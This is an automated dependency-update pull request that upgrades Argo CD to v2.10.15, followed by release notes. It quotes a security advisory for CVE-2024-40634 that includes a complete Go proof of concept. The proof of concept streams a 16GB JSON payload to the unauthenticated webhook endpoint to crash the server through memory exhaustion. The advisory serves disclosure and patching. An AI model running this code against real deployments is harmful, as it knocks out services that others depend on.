Update module github.com/argoproj/argo-cd/v2 to v2.10.15 [SECURITY] - autoclosed

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
github.com/argoproj/argo-cd/v2	v2.10.10 -> v2.10.15

GitHub Vulnerability Alerts

CVE-2024-40634

Summary

This report details a security vulnerability in Argo CD, where an unauthenticated attacker can send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation that leads to service disruption by triggering an Out Of Memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.

Details

The webhook server always listens to requests. By default, the endpoint doesn't require authentication. It's possible to send a large, malicious request with headers (in this case "X-GitHub-Event: push") that will make ArgoCD start allocating memory to parse the incoming request. Since the request can be constructed client-side without allocating large amounts of memory, it can be arbitrarily large. Eventually, the argocd-server component will get OOMKilled as it consumes all its available memory.

The fix would be to enforce a limit on the size of the request being parsed.

PoC

Port-forward to the argocd-server service, like so:

kubectl port-forward svc/argocd-server -n argocd 8080:443

Run the below code:

package main

import (
	"crypto/tls"
	"io"
	"net/http"
)

// Define a custom io.Reader that generates a large dummy JSON payload.
type DummyJSONReader struct {
	size int64 // Total size to generate
	read int64 // Bytes already generated
}

// Read generates the next chunk of the dummy JSON payload.
func (r *DummyJSONReader) Read(p []byte) (n int, err error) {
	if r.read >= r.size {
		return 0, io.EOF // Finished generating
	}

	start := false
	if r.read == 0 {
		// Start of JSON
		p[0] = '{'
		p[1] = '"'
		p[2] = 'd'
		p[3] = 'a'
		p[4] = 't'
		p[5] = 'a'
		p[6] = '"'
		p[7] = ':'
		p[8] = '"'
		n = 9
		start = true
	}

	for i := n; i < len(p); i++ {
		if r.read+int64(i)-int64(n)+1 == r.size-1 {
			// End of JSON
			p[i] = '"'
			p[i+1] = '}'
			r.read += int64(i) + 2 - int64(n)
			return i + 2 - n, nil
		} else {
			p[i] = 'x' // Dummy data
		}
	}

	r.read += int64(len(p)) - int64(n)
	if start {
		return len(p), nil
	}
	return len(p) - n, nil
}

func main() {
	// Initialize the custom reader with the desired size (16GB in this case).
	payloadSize := int64(16) * 1024 * 1024 * 1024 // 16GB
	reader := &DummyJSONReader{size: payloadSize}

	// HTTP client setup
	httpClient := &http.Client{
		Timeout: 0, // No timeout
		Transport: &http.Transport{
			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
		},
	}

	req, err := http.NewRequest("POST", "https://localhost:8080/api/webhook", reader)
	if err != nil {
		panic(err)
	}

	// Set headers
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("X-GitHub-Event", "push")

	resp, err := httpClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	println("Response status code:", resp.StatusCode)
}

Patches

A patch for this vulnerability has been released in the following Argo CD versions:

v2.11.6
v2.10.15
v2.9.20

For more information

If you have any questions or comments about this advisory:

Open an issue in the Argo CD issue tracker or discussions
Join us on Slack in channel #argo-cd

Credits

This vulnerability was found & reported by Jakub Ciolek

The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue

---

Release Notes

argoproj/argo-cd (github.com/argoproj/argo-cd/v2)

v2.10.15

Compare Source

v2.10.14

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.14/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.14/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 7e99a13: fix(cli): Get Redis password from secret in loadClusters() (#​18951) (#​18957) (@​gcp-cherry-pick-bot[bot])

Other work

• d8ddce8: chore: update gitops-engine (#​19054) (@​ncdc)

Full Changelog: argoproj/argo-cd@v2.10.13...v2.10.14

v2.10.13

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.13/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.13/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 9c71133: fix(controller): bad server-side diffs (#​18213) (2.10) (#​18869) (@​crenshaw-dev)
• 9d8148b: fix: Update braces package to 3.0.3 (#​18459) (#​18664) (@​gcp-cherry-pick-bot[bot])
• 2fbb69b: fix: update static schemas (#​18890) (@​crenshaw-dev)

Documentation

• 2c2064b: docs: Fix .path to .path.segments go template (#​18872) (#​18875) (@​gcp-cherry-pick-bot[bot])

Other work

• c79714d: chore: bump go version to 1.21.10 (#​18541) (@​34fathombelow)

Full Changelog: argoproj/argo-cd@v2.10.12...v2.10.13

v2.10.12

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.12/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.12/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Other work

• ec35043: Merge pull request from GHSA-3cqf-953p-h5cp (@​pasha-codefresh)
• 531123b: Merge pull request from GHSA-87p9-x75h-p4j2 (@​blakepettersson)

Full Changelog: argoproj/argo-cd@v2.10.11...v2.10.12

v2.10.11

Compare Source

Quick Start

Non-HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.11/manifests/install.yaml

HA:

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v2.10.11/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes

• 0a179fb: fix(deps): upgrade otel dependency (#​18285) (#​18325) (@​gcp-cherry-pick-bot[bot])
• 82ae349: fix: remove Egress NetworkPolicy for argocd-redis and argocd-redis-ha-haproxy - 2.10 (#​18381) (@​pasha-codefresh)
• f61f472: fix: revert registry change (#​18328) (#​18336) (@​crenshaw-dev)

Other work

• a960c6b: chore(ci): fix release notes (#​18132) (#​18331) (@​gcp-cherry-pick-bot[bot])

Full Changelog: argoproj/argo-cd@v2.10.10...v2.10.11

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 2 additional dependencies were updated

Details:

Package	Change
github.com/argoproj/gitops-engine	v0.7.1-0.20240416142647-fbecbb86e412 -> v0.7.1-0.20240715141017-b6ec82aedce5
go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc	v0.42.0 -> v0.46.1